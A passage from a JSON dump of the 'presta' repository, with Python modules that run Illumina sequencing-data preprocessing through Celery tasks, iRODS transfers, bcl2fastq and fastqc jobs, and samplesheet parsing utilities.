os.path.join(rpath),\n 'filename': 'runParameters.xml'}\n run_parameters['file_path'] = os.path.join(run_parameters['basepath'],\n run_parameters['filename'])\n run_parameters['file_apath'] = os.path.join(apath,\n run_parameters['filename'])\n\n self.run_parameters = run_parameters\n\n do_conf = conf.get_section('data_ownership')\n self.user = do_conf.get('user')\n self.group = do_conf.get('group')\n\n self.no_lane_splitting = args.no_lane_splitting\n\n self.barcode_mismatches = args.barcode_mismatches\n\n self.overwrite_samplesheet = args.overwrite_samplesheet\n\n self.copy_qc = args.export_qc\n\n self.batch_queuing = args.batch_queuing\n self.queues_conf = conf.get_section('queues')\n\n self._add_config_from_cli(args)\n\n def _add_config_from_cli(self, args):\n if args.output:\n self.ds['path'] = args.output\n\n if args.fastqc_outdir:\n self.fqc['path'] = args.fastq_outdir\n\n def run(self):\n path_exists(self.rd['rpath'], self.logger)\n rd_status_checks = rd_ready_to_be_preprocessed(\n user=self.user,\n group=self.group,\n path=self.rd['rpath'],\n rd_label=self.rd['label'],\n ssht_filename=self.samplesheet['filename'],\n ir_conf=self.conf.get_irods_section())\n\n check = rd_status_checks[0] and rd_status_checks[1] and \\\n rd_status_checks[2][0]\n\n barcodes_have_same_size = rd_status_checks[2][1]\n check_sanitize_metadata = not rd_status_checks[3]\n\n if not check:\n self.logger.error(\"{} is not ready to be preprocessed\".format(\n self.rd['label']))\n sys.exit()\n\n self.logger.info('Processing {}'.format(self.rd['label']))\n self.logger.info('running path {}'.format(self.rd['rpath']))\n self.logger.info('completed path {}'.format(self.rd['cpath']))\n self.logger.info('archive path {}'.format(self.rd['apath']))\n self.logger.info('samplesheet path {}'.format(self.samplesheet['file_path']))\n\n ensure_dir(self.ds['path'])\n ensure_dir(self.fqc['path'])\n\n irods_task = chain(\n sanitize_metadata.si(conf=self.conf.get_irods_section(),\n ssht_filename=self.samplesheet['filename'],\n rd_label=self.rd['label'],\n sanitize=check_sanitize_metadata\n ),\n\n copy_run_info_to_irods.si(conf=self.conf.get_irods_section(),\n run_info_path=self.run_info['file_path'],\n rd_label=self.rd['label']\n ),\n\n copy_run_parameters_to_irods.si(conf=self.conf.get_irods_section(),\n run_parameters_path=self.run_parameters['file_path'],\n rd_label=self.rd['label']\n ),\n )\n\n samplesheet_task = chain(\n\n copy_samplesheet_from_irods.si(conf=self.conf.get_irods_section(),\n ssht_path=self.samplesheet['file_path'],\n rd_label=self.rd['label'],\n overwrite_samplesheet=self.overwrite_samplesheet\n ),\n\n replace_values_into_samplesheet.si(conf=self.conf.get_irods_section(),\n ssht_path=self.samplesheet['file_path'],\n rd_label=self.rd['label'],\n overwrite_samplesheet=self.overwrite_samplesheet\n ),\n\n )\n\n qc_task = chain(rd_collect_fastq.si(ds_path=self.ds['path']),\n qc_runner.s(outdir=self.fqc['path'],\n batch_queuing=self.batch_queuing,\n queue_spec=self.queues_conf.get('low')),\n copy_qc_dirs.si(src=self.fqc['path'],\n dest=self.fqc['export_path'],\n copy_qc=self.copy_qc),\n )\n\n # full pre-processing sequencing rundir pipeline\n pipeline = chain(\n irods_task,\n samplesheet_task,\n\n replace_index_cycles_into_run_info.si(conf=self.conf.get_irods_section(),\n barcodes_have_same_size=barcodes_have_same_size,\n run_info_path=self.run_info['file_path'],\n rd_label=self.rd['label']),\n\n move.si(self.rd['rpath'], self.rd['apath']),\n bcl2fastq.si(rd_path=self.rd['apath'],\n ds_path=self.ds['path'],\n ssht_path=self.samplesheet['file_path'],\n no_lane_splitting=self.no_lane_splitting,\n barcode_mismatches=self.barcode_mismatches,\n batch_queuing=self.batch_queuing,\n queue_spec=self.queues_conf.get('low')),\n\n replace_index_cycles_into_run_info.si(conf=self.conf.get_irods_section(),\n barcodes_have_same_size=barcodes_have_same_size,\n run_info_path=self.run_info['file_apath'],\n rd_label=self.rd['label']),\n\n qc_task,\n ).delay()\n\n\nhelp_doc = \"\"\"\nProcess a rundir\n\"\"\"\n\n\ndef make_parser(parser):\n parser.add_argument('--rd_path', metavar=\"PATH\",\n help=\"rundir path\", required=True)\n parser.add_argument('--output', type=str, help='output path', default='')\n\n parser.add_argument('--overwrite_samplesheet', dest='overwrite_samplesheet',\n action='store_true',\n help='Overwrite the samplesheet '\n 'if already present into the filesystem (default)')\n parser.add_argument('--no_overwrite_samplesheet', dest='overwrite_samplesheet',\n action='store_false',\n help='Do not overwrite the samplesheet '\n 'if already present into the filesystem')\n\n parser.add_argument('--fastqc_outdir', type=str, help='fastqc output path')\n\n parser.add_argument('--no_lane_splitting', action='store_true',\n help='Do not split fastq by lane')\n\n parser.add_argument('--export_qc', action='store_true',\n help='Export qc reports, running \"presta qc\"')\n\n parser.add_argument(\"--barcode_mismatches\", type=int, choices=[0, 1, 2],\n default=1, help='Number of allowed mismatches per index')\n\n parser.set_defaults(overwrite_samplesheet=True)\n\n\ndef implementation(logger, args):\n workflow = PreprocessingWorkflow(args=args, logger=logger)\n workflow.run()\n\n\ndef do_register(registration_list):\n registration_list.append(('proc', help_doc, make_parser,\n implementation))\n"
},
{
"alpha_fraction": 0.8139534592628479,
"alphanum_fraction": 0.8139534592628479,
"avg_line_length": 20,
"blob_id": "3a0ae474444dba3d44d15d0b7079d856fb743278",
"content_id": "0b598ae638526cc2d05b9dcf2a6059430426161c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 43,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "# presta\nPreprocessing of sequencing data \n"
},
{
"alpha_fraction": 0.554798424243927,
"alphanum_fraction": 0.5556501746177673,
"avg_line_length": 36.46808624267578,
"blob_id": "033fccfa92449a5c7076d7a469a61f08455d7996",
"content_id": "b9edddc204af2846a23ffa53088ffaff9cac0c82",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3522,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 94,
"path": "/presta/qc.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "import os.path\nimport sys\n\nfrom alta.utils import ensure_dir\nfrom celery import chain\nfrom presta.app.tasks import copy_qc_dirs, rd_collect_fastq, qc_runner\nfrom presta.utils import path_exists, get_conf\n\n\nclass QcWorkflow(object):\n def __init__(self, args=None, logger=None):\n self.logger = logger\n conf = get_conf(logger, args.config_file)\n self.batch_queuing = args.batch_queuing\n self.queues_conf = conf.get_section('queues')\n\n r_dir_label = args.rundir_label\n ds_dir_label = 'datasets'\n fqc_dir_label = 'fastqc'\n\n input_path = args.ds_path\n output_path = args.export_path\n\n if r_dir_label or (input_path and output_path):\n pass\n else:\n logger.error(\"You must provide the rundir_label or both ds_path \"\n \"and export_path\")\n sys.exit()\n\n # input path must exists as parser argument or as config file argument\n if not input_path:\n io_conf = conf.get_io_section()\n input_path = os.path.join(io_conf.get('archive_root_path'),\n r_dir_label,\n ds_dir_label)\n path_exists(input_path, logger)\n self.input_path = input_path\n\n # export path must exists as parser argument or as config file argument\n if not output_path:\n io_conf = conf.get_io_section()\n output_path = os.path.join(io_conf.get('qc_export_basepath'),\n r_dir_label)\n # FIXME: this is a local path, must be checked that run on right node\n if not path_exists(output_path, logger, force=False):\n ensure_dir(output_path)\n path_exists(output_path, logger)\n self.output_path = output_path\n\n self.fqc_path = os.path.join(self.input_path, fqc_dir_label)\n\n def run(self):\n\n copy_task = copy_qc_dirs.si(self.input_path, self.output_path)\n msgs = [\"Generating Fastqc reports\",\n \"Coping qc dirs from {} to {}\".format(self.input_path,\n self.output_path)]\n if not path_exists(self.fqc_path, self.logger, force=False):\n self.logger.info(\"{} and {}\".format(msgs[0], msgs[1]))\n ensure_dir(self.fqc_path)\n qc_task = chain(rd_collect_fastq.si(ds_path=self.input_path),\n qc_runner.s(outdir=self.fqc_path,\n batch_queuing=self.batch_queuing,\n queue_spec=self.queues_conf.get('q_fastqc')),\n copy_task\n ).delay()\n else:\n self.logger.info(msgs[1])\n copy_task.delay()\n\n\nhelp_doc = \"\"\"\nGenerate (if needed) and export quality control reports\n\"\"\"\n\n\ndef make_parser(parser):\n parser.add_argument('--rundir_label', '-r', metavar=\"STRING\",\n help='Label of the rundir to process')\n parser.add_argument('--ds_path', metavar=\"PATH\",\n help=\"Where datasets are stored\")\n parser.add_argument('--export_path', type=str, metavar=\"PATH\",\n help='Where qc reports have to be stored')\n\n\ndef implementation(logger, args):\n workflow = QcWorkflow(args=args, logger=logger)\n workflow.run()\n\n\ndef do_register(registration_list):\n registration_list.append(('qc', help_doc, make_parser,\n implementation))\n"
},
{
"alpha_fraction": 0.5709547400474548,
"alphanum_fraction": 0.5731295943260193,
"avg_line_length": 34.921875,
"blob_id": "147d1f8254fe186ca80ee3729ef5021b9b53495c",
"content_id": "1b5847d125a5f6955e99ee89b7fc8631e7c88bc2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18392,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 512,
"path": "/presta/app/tasks.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import\n\nfrom . import app\nfrom alta.objectstore import build_object_store\nfrom alta.utils import ensure_dir\nfrom celery import group\nimport drmaa\nfrom grp import getgrgid\nfrom presta.utils import IEMSampleSheetReader\nfrom presta.utils import IEMRunInfoReader\nfrom pwd import getpwuid\nimport errno\nimport os\nimport shlex\nimport shutil\nimport subprocess\n\nfrom celery.utils.log import get_task_logger\n\nlogger = get_task_logger(__name__)\n\n\[email protected](name='presta.app.tasks.check_rd_ready_to_be_preprocessed')\ndef check_rd_ready_to_be_preprocessed(**kwargs):\n logger.info('Cron Task: searching for run ready to be preprocessed...')\n cmd_line = ['presta', 'check', '--proc_rundir']\n output = runJob(cmd_line)\n return True if output else False\n\n\[email protected](name='presta.app.tasks.process_rundir')\ndef process_rundir(**kwargs):\n rd_path = kwargs.get('rd_path')\n rd_label = kwargs.get('rd_label')\n logger.info('Cron Task: {} is ready to be processed. Start preprocessing...'.format(rd_label))\n cmd_line = ['presta', 'proc', '--rd_path', rd_path, '--export_qc']\n output = runJob(cmd_line)\n return True if output else False\n\n\[email protected](name='presta.app.tasks.rd_collect_fastq')\ndef rd_collect_fastq(**kwargs):\n path = kwargs.get('ds_path')\n results = []\n for (localroot, dirnames, filenames) in os.walk(path):\n for f in filenames:\n if f[-3:] == '.gz':\n logger.info('FASTQ = {}'.format(f))\n results.append(os.path.join(localroot, f))\n return results\n\n\[email protected](name='presta.app.tasks.rd_ready_to_be_preprocessed')\ndef rd_ready_to_be_preprocessed(**kwargs):\n \"\"\"\n Verify if sequencer has ended to write, if rundir's ownership is\n correct and if samplesheet has been uploaded into iRODS\n \"\"\"\n path = kwargs.get('path')\n user = kwargs.get('user')\n grp = kwargs.get('group')\n rundir_label = kwargs.get('rd_label')\n samplesheet_filename = kwargs.get('ssht_filename', 'SampleSheet.csv')\n ir_conf = kwargs.get('ir_conf')\n ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label,\n samplesheet_filename)\n\n task0 = seq_completed.si(path)\n task1 = check_ownership.si(user=user, group=grp, dir=path)\n task2 = samplesheet_ready.si(ir_conf, ipath)\n task3 = check_metadata.si(ir_conf, os.path.dirname(ipath))\n\n pipeline = group(task0, task1, task2, task3)()\n\n while pipeline.waiting():\n pass\n return pipeline.join()\n\n\[email protected](name='presta.app.tasks.samplesheet_ready')\ndef samplesheet_ready(ir_conf, ipath):\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n\n exists, iobj = ir.exists(ipath, delivery=True)\n ir.sess.cleanup()\n if exists:\n with iobj.open('r') as f:\n samplesheet = IEMSampleSheetReader(f)\n\n return exists, samplesheet.barcodes_have_the_same_size()\n else:\n return False, False\n\n\[email protected](name='presta.app.tasks.check_metadata')\ndef check_metadata(ir_conf, ipath, get_metadata=False):\n\n def retrieve_imetadata(iobj):\n return [dict(name=m.name,\n value=m.value,\n units=m.units)\n for m in iobj.metadata.items()]\n\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n\n exists, iobj = ir.exists(ipath, delivery=True)\n ir.sess.cleanup()\n\n if get_metadata:\n return exists and len(iobj.metadata.items()) > 0, retrieve_imetadata(iobj)\n\n return exists and len(iobj.metadata.items()) > 0\n\n\[email protected](name='presta.app.tasks.seq_completed')\ndef seq_completed(rd_path):\n illumina_last_file = 'RTAComplete.txt'\n localroot, dirnames, filenames = os.walk(rd_path).next()\n return True if illumina_last_file in filenames else False\n\n\[email protected](name='presta.app.task.check_ownership')\ndef check_ownership(**kwargs):\n user = kwargs.get('user')\n grp = kwargs.get('group')\n d = kwargs.get('dir')\n\n def find_owner(directory):\n return getpwuid(os.stat(directory).st_uid).pw_name\n\n def find_group(directory):\n return getgrgid(os.stat(directory).st_gid).gr_name\n\n return True if user == find_owner(d) and grp == find_group(d) else False\n\n\[email protected](name='presta.app.tasks.copy')\ndef copy(src, dest):\n result = False\n try:\n shutil.copytree(src, dest)\n result = True\n except OSError as e:\n if e.errno == errno.ENOTDIR:\n shutil.copy(src, dest)\n else:\n logger.error('Source not copied. Error: {}'.format(e))\n return result\n\n\[email protected](name='presta.app.tasks.copy_qc_dirs', ignore_result=True)\ndef copy_qc_dirs(src, dest, copy_qc=True):\n if copy_qc:\n dirs = ['Stats', 'Reports', 'fastqc']\n ensure_dir(dest)\n task0 = copy.si(os.path.join(src, dirs[0]), os.path.join(dest, dirs[0]))\n task1 = copy.si(os.path.join(src, dirs[1]), os.path.join(dest, dirs[1]))\n task2 = copy.si(os.path.join(src, dirs[2]), os.path.join(dest, dirs[2]))\n\n job = group(task0, task1, task2)()\n while job.waiting():\n pass\n return job.join()\n\n return None\n\n\[email protected](name='presta.app.tasks.sanitize_metadata', ignore_result=True)\ndef sanitize_metadata(**kwargs):\n ir_conf = kwargs.get('conf')\n rundir_label = kwargs.get('rd_label')\n samplesheet_filename = kwargs.get('ssht_filename')\n sanitize = kwargs.get('sanitize')\n\n if sanitize:\n rundir_ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label)\n\n samplesheet_ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label,\n samplesheet_filename)\n\n samplesheet_has_metadata, imetadata = check_metadata(ir_conf=ir_conf,\n ipath=samplesheet_ipath,\n get_metadata=True)\n if samplesheet_has_metadata:\n __set_imetadata(ir_conf=ir_conf,\n ipath=rundir_ipath,\n imetadata=imetadata)\n\n\[email protected](name='presta.app.tasks.copy_samplesheet_from_irods',\n ignore_result=True)\ndef copy_samplesheet_from_irods(**kwargs):\n ir_conf = kwargs.get('conf')\n samplesheet_file_path = kwargs.get('ssht_path')\n samplesheet_filename = os.path.basename(samplesheet_file_path)\n rundir_label = kwargs.get('rd_label')\n overwrite_samplesheet = kwargs.get('overwrite_samplesheet')\n\n if overwrite_samplesheet:\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n\n ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label,\n samplesheet_filename)\n logger.info('Coping samplesheet from iRODS {} to FS {}'.format(\n ipath, samplesheet_file_path))\n ir.get_object(ipath, dest_path=samplesheet_file_path)\n ir.sess.cleanup()\n return samplesheet_file_path\n\n\[email protected](name='presta.app.tasks.copy_run_info_to_irods',\n ignore_result=True)\ndef copy_run_info_to_irods(**kwargs):\n ir_conf = kwargs.get('conf')\n run_info_file_path = kwargs.get('run_info_path')\n run_info_filename = os.path.basename(run_info_file_path)\n rundir_label = kwargs.get('rd_label')\n\n irods_path = os.path.join(ir_conf['runs_collection'],\n rundir_label,\n run_info_filename)\n\n __copy_file_into_irods(conf=ir_conf,\n file_path=run_info_file_path,\n irods_path=irods_path)\n\n return run_info_file_path\n\n\[email protected](name='presta.app.tasks.copy_run_parameters_to_irods',\n ignore_result=True)\ndef copy_run_parameters_to_irods(**kwargs):\n ir_conf = kwargs.get('conf')\n run_parameters_file_path = kwargs.get('run_parameters_path')\n run_parameters_filename = os.path.basename(run_parameters_file_path)\n rundir_label = kwargs.get('rd_label')\n\n irods_path = os.path.join(ir_conf['runs_collection'],\n rundir_label,\n run_parameters_filename)\n\n __copy_file_into_irods(conf=ir_conf,\n file_path=run_parameters_file_path,\n irods_path=irods_path)\n\n return run_parameters_file_path\n\n\[email protected](name='presta.app.tasks.replace_values_into_samplesheet',\n ignore_result=True)\ndef replace_values_into_samplesheet(**kwargs):\n\n samplesheet_file_path = kwargs.get('ssht_path')\n overwrite_samplesheet = kwargs.get('overwrite_samplesheet')\n\n if overwrite_samplesheet:\n with open(samplesheet_file_path, 'r') as f:\n samplesheet = IEMSampleSheetReader(f)\n\n with open(samplesheet_file_path, 'w') as f:\n for row in samplesheet.get_body(replace=True):\n f.write(row)\n\[email protected](name='presta.app.tasks.replace_index_cycles_into_run_info',\n ignore_result=True)\ndef replace_index_cycles_into_run_info(**kwargs):\n ir_conf = kwargs.get('conf')\n overwrite_run_info_file = not kwargs.get('barcodes_have_same_size')\n run_info_file_path = kwargs.get('run_info_path')\n rundir_label = kwargs.get('rd_label')\n\n if overwrite_run_info_file:\n index_cycles_from_metadata = __get_index_cycles_from_metadata(ir_conf=ir_conf,\n rundir_label=rundir_label)\n\n index_cycles_from_run_info_file, default_index_cycles = __get_index_cycles_from_run_info_file(\n run_info_file_path=run_info_file_path,\n get_default_values=True)\n\n index_cycles = default_index_cycles \\\n if index_cycles_from_metadata == index_cycles_from_run_info_file\\\n else index_cycles_from_metadata\n\n logger.info('Editing index cycles on: {}\\n'\n 'Old values:{}\\n'\n 'New values: {}'.format(run_info_file_path,\n index_cycles_from_run_info_file,\n index_cycles))\n\n run_info_file = IEMRunInfoReader(run_info_file_path)\n run_info_file.set_index_cycles(index_cycles)\n\n\[email protected](name='presta.app.tasks.move', ignore_result=True)\ndef move(src, dest):\n try:\n shutil.move(src, dest)\n except shutil.Error as e:\n logger.error('Source not moved. Error: {}'.format(e))\n\n\[email protected](name='presta.app.tasks.bcl2fastq')\ndef bcl2fastq(**kwargs):\n rd_path = kwargs.get('rd_path')\n ds_path = kwargs.get('ds_path')\n ssht_path = kwargs.get('ssht_path')\n no_lane_splitting = kwargs.get('no_lane_splitting', False)\n barcode_mismatches = kwargs.get('barcode_mismatches', 1)\n submit_to_batch_scheduler = kwargs.get('batch_queuing', True)\n queue_spec = kwargs.get('queue_spec')\n\n command = 'bcl2fastq'\n rd_arg = '-R {}'.format(rd_path)\n output_arg = '-o {}'.format(ds_path)\n samplesheet_arg = '--sample-sheet {}'.format(ssht_path)\n options = ['--ignore-missing-bcls',\n '--ignore-missing-filter',\n '--ignore-missing-positions',\n '--find-adapters-with-sliding-window',\n '--barcode-mismatches {}'.format(barcode_mismatches)]\n\n if no_lane_splitting:\n options.append('--no-lane-splitting')\n\n with open(ssht_path, 'r') as f:\n samplesheet = IEMSampleSheetReader(f)\n\n barcode_mask = samplesheet.get_barcode_mask()\n for lane, barcode_length in barcode_mask.items():\n if barcode_length['index1'] is None or barcode_length['index1'] in ['None']:\n options.append(\"--use-bases-mask {}:Y*,I{}n*,Y*\".format(lane, barcode_length['index']))\n else:\n options.append(\n \"--use-bases-mask {}:Y*,I{}n*,I{}n*,Y*\".format(lane, barcode_length['index'], barcode_length['index1']))\n\n cmd_line = shlex.split(' '.join([command, rd_arg, output_arg,\n samplesheet_arg, ' '.join(options)]))\n logger.info('Executing {}'.format(cmd_line))\n\n if submit_to_batch_scheduler:\n home = os.path.expanduser(\"~\")\n launcher = kwargs.get('launcher', 'launcher')\n\n jt = {'jobName': command,\n 'nativeSpecification': queue_spec,\n 'remoteCommand': os.path.join(home, launcher),\n 'args': cmd_line\n }\n output = runGEJob(jt)\n else:\n output = runJob(cmd_line)\n\n return True if output else False\n\n\[email protected](name='presta.app.tasks.qc_runner', ignore_result=True)\ndef qc_runner(file_list, **kwargs):\n def chunk(lis, n):\n return [lis[i:i + n] for i in range(0, len(lis), n)]\n\n chunk_size = kwargs.get('chunk_size', 6)\n for f in chunk(file_list, chunk_size):\n fastqc.s(f, outdir=kwargs.get('outdir'),\n threads=chunk_size,\n batch_queuing=kwargs.get('batch_queuing'),\n queue_spec=kwargs.get('queue_spec')\n ).delay()\n\n\[email protected](name='presta.app.tasks.fastqc')\ndef fastqc(fq_list, **kwargs):\n command = 'fastqc'\n output_arg = '--outdir {}'.format(kwargs.get('outdir'))\n options = ['--format fastq',\n '--threads {}'.format(kwargs.get('threads', 1))]\n fq_list_arg = ' '.join(fq_list)\n submit_to_batch_scheduler = kwargs.get('batch_queuing', True)\n queue_spec = kwargs.get('queue_spec')\n\n cmd_line = shlex.split(' '.join([command, output_arg, ' '.join(options),\n fq_list_arg]))\n logger.info('Executing {}'.format(cmd_line))\n\n if submit_to_batch_scheduler:\n home = os.path.expanduser(\"~\")\n launcher = kwargs.get('launcher', 'launcher')\n\n jt = {'jobName': command,\n 'nativeSpecification': queue_spec,\n 'remoteCommand': os.path.join(home, launcher),\n 'args': cmd_line\n }\n output = runGEJob(jt)\n else:\n output = runJob(cmd_line)\n\n return True if output else False\n\n\ndef __set_imetadata(ir_conf, ipath, imetadata):\n\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n for m in imetadata:\n ir.add_object_metadata(path=ipath,\n meta=(m.get('name'),\n m.get('value') if len(m.get('value')) > 0 else None,\n m.get('units')))\n ir.sess.cleanup()\n\n\ndef __copy_file_into_irods(**kwargs):\n ir_conf = kwargs.get('conf')\n file_path = kwargs.get('file_path')\n irods_path = kwargs.get('irods_path')\n\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n\n logger.info('Coping from FS {} to iRODS {}'.format(file_path, irods_path))\n\n ir.put_object(source_path=file_path, dest_path=irods_path, force=True)\n ir.sess.cleanup()\n\n\ndef __get_index_cycles_from_metadata(ir_conf, rundir_label):\n ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label)\n rundir_has_metadata, imetadata = check_metadata(ir_conf=ir_conf,\n ipath=ipath,\n get_metadata=True)\n if rundir_has_metadata:\n return dict(index=next((m['value'] for m in imetadata\n if m[\"name\"] == \"index1_cycles\" and m['value'] != \"None\"), None),\n index1=next((m['value'] for m in imetadata\n if m[\"name\"] == \"index2_cycles\" and m['value'] != \"None\"), None),\n )\n\n return dict(index=None, index1=None)\n\n\ndef __get_index_cycles_from_run_info_file(run_info_file_path, get_default_values=False):\n with open(run_info_file_path, 'r') as f:\n run_info_file = IEMRunInfoReader(f)\n\n if get_default_values:\n return run_info_file.get_index_cycles(), run_info_file.get_default_index_cycles()\n\n return run_info_file.get_index_cycles()\n\n\ndef runGEJob(jt_attr):\n def init_job_template(jt, attr):\n jt.jobName = '_'.join(['presta', attr['jobName']])\n jt.nativeSpecification = attr['nativeSpecification']\n jt.remoteCommand = attr['remoteCommand']\n jt.args = attr['args']\n return jt\n\n with drmaa.Session() as s:\n jt = init_job_template(s.createJobTemplate(), jt_attr)\n jobid = s.runJob(jt)\n logger.info('Your job has been submitted with ID %s' % jobid)\n\n retval = s.wait(jobid, drmaa.Session.TIMEOUT_WAIT_FOREVER)\n logger.info('Job: {0} finished with status {1}'.format(retval.jobId,\n retval.exitStatus))\n\n logger.info('Cleaning up')\n s.deleteJobTemplate(jt)\n\n return retval.hasExited\n\n\ndef runJob(cmd):\n try:\n subprocess.check_output(cmd)\n return True\n except subprocess.CalledProcessError as e:\n logger.info(e)\n if e.output:\n logger.info(\"command output: %s\", e.output)\n else:\n logger.info(\"no command output available\")\n return False\n"
},
{
"alpha_fraction": 0.5342350006103516,
"alphanum_fraction": 0.5381797552108765,
"avg_line_length": 31.70967674255371,
"blob_id": "f07b6721dc7a3e83e1f4bd8056e685aa93f98dc3",
"content_id": "ac16a6ecab57cb103917053f3fb6ebe8f39b18d7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7098,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 217,
"path": "/presta/utils/__init__.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUtilities used by other modules.\n\"\"\"\n\nimport csv\nimport os\nimport re\nimport string\nimport sys\n\nimport xml.etree.ElementTree as ET\nfrom alta import ConfigurationFromYamlFile\nfrom pkg_resources import resource_filename\n\nSAMPLES_WITHOUT_BARCODES = [2, 8]\nDEFAULT_INDEX_CYCLES = dict(index='8', index1='8')\n\nclass IEMRunInfoReader:\n \"\"\"\n Illumina Experimental Manager RunInfo xml reader.\n \"\"\"\n\n def __init__(self, f):\n self.xml_file = f\n self.tree = ET.parse(self.xml_file)\n self.root = self.tree.getroot()\n\n def get_reads(self):\n reads = [r.attrib for r in self.root.iter('Read')]\n return reads\n\n def get_indexed_reads(self):\n reads = self.get_reads()\n return filter(lambda item: item[\"IsIndexedRead\"] == \"Y\", reads)\n\n def get_index_cycles(self):\n indexed_reads = self.get_indexed_reads()\n return dict(\n index=next((item['NumCycles'] for item in indexed_reads\n if item[\"IsIndexedRead\"] == \"Y\" and item['Number'] == \"2\"), None),\n index1=next((item['NumCycles'] for item in indexed_reads\n if item[\"IsIndexedRead\"] == \"Y\" and item['Number'] != \"2\"), None))\n\n def get_default_index_cycles(self):\n return DEFAULT_INDEX_CYCLES\n\n def set_index_cycles(self, index_cycles, write=True):\n\n for read in self.root.iter('Read'):\n if read.attrib[\"IsIndexedRead\"] == \"Y\":\n if read.attrib['Number'] == '2':\n read.attrib.update(NumCycles=index_cycles.get('index', DEFAULT_INDEX_CYCLES['index']))\n else:\n read.attrib.update(NumCycles=index_cycles.get('index', DEFAULT_INDEX_CYCLES['index']))\n if write:\n self.tree.write(self.xml_file)\n\n\n\nclass IEMSampleSheetReader(csv.DictReader):\n \"\"\"\n Illumina Experimental Manager SampleSheet reader.\n \"\"\"\n\n def __init__(self, f):\n csv.DictReader.__init__(self, f, delimiter=',')\n self.header = ''\n self.data = ''\n\n first_line = f.readline()\n if not first_line.startswith('[Header]'):\n raise ValueError('%s is not an IEM samplesheet'.format(f.name))\n header = [first_line.strip()]\n l = f.readline()\n while not l.startswith('[Data]'):\n header.append(l.strip()) # ms-dos\n l = f.readline()\n else:\n header.append(l.strip())\n self.header = header\n\n self.data = csv.DictReader(f.readlines(), delimiter=',')\n\n def barcodes_have_the_same_size(self):\n def mean(data):\n \"\"\"Return the sample arithmetic mean of data.\"\"\"\n n = len(data)\n if n < 1:\n raise ValueError('mean requires at least one data point')\n return sum(data) / float(n)\n\n def _ss(data):\n \"\"\"Return sum of square deviations of sequence data.\"\"\"\n c = mean(data)\n ss = sum((x - c) ** 2 for x in data)\n return ss\n\n def pstdev(data):\n \"\"\"Calculates the population standard deviation.\"\"\"\n n = len(data)\n\n if n < 2:\n raise ValueError('variance requires at least two data points')\n ss = _ss(data)\n pvar = ss / n # the population variance\n return pvar ** 0.5\n\n lengths = []\n to_be_verified = ['index']\n\n for row in self.data:\n for f in self.data.fieldnames:\n if f in to_be_verified:\n lengths.append(len(row[f]))\n\n if len(lengths) == 0:\n return True\n\n return True if pstdev(lengths) == float(0) else False\n\n def get_body(self, label='Sample_Name', new_value='', replace=True):\n def sanitize(mystr):\n \"\"\"\n Sanitize string in accordance with Illumina's documentation\n bcl2fastq2 Conversion Software v2.17 Guide\n \"\"\"\n retainlist = \"_-\"\n return re.sub(r'[^\\w' + retainlist + ']', '_', mystr)\n\n body = []\n for i in self.header:\n body.append(i)\n body.append('\\n')\n body.append(string.join(self.data.fieldnames, ','))\n body.append('\\n')\n\n to_be_sanitized = ['Sample_Project', 'Sample_Name']\n\n for row in self.data:\n for f in self.data.fieldnames:\n if replace and f == label:\n body.append(new_value)\n else:\n if f in to_be_sanitized:\n body.append(sanitize(row[f]))\n else:\n body.append(row[f])\n body.append(',')\n body.append('\\n')\n\n return body\n\n def get_barcode_mask(self):\n barcodes_mask = dict()\n\n for row in self.data:\n if row['Lane'] not in barcodes_mask:\n barcodes_mask[row['Lane']] = dict(\n index=len(row['index']) if 'index' in row else None,\n index1=len(row['index1']) if 'index1' in row else None,\n )\n\n return barcodes_mask\n\n\n\ndef get_conf(logger, config_file):\n config_file_path = paths_setup(logger, config_file)\n\n # Load YAML configuration file\n return ConfigurationFromYamlFile(config_file_path)\n\n\ndef path_exists(path, logger, force=True):\n def file_missing(path, logger, force):\n if force:\n logger.error(\"path - {} - doesn't exists\".format(path))\n sys.exit()\n return False\n\n return True if os.path.exists(os.path.expanduser(path)) else file_missing(path,\n logger,\n force)\n\n\ndef paths_setup(logger, cf_from_cli=None):\n home = os.path.expanduser(\"~\")\n presta_config_from_home = os.path.join(home, 'presta',\n 'presta_config.yml')\n presta_config_from_package = resource_filename('presta',\n 'config/presta_config.yml')\n config_file_paths = []\n if cf_from_cli and path_exists(cf_from_cli, logger, force=False):\n config_file_paths.append(WeightedPath(cf_from_cli, 0))\n if path_exists(presta_config_from_home, logger, force=False):\n config_file_paths.append(WeightedPath(presta_config_from_home, 1))\n if path_exists(presta_config_from_package, logger, force=False):\n config_file_paths.append(WeightedPath(presta_config_from_package, 2))\n\n 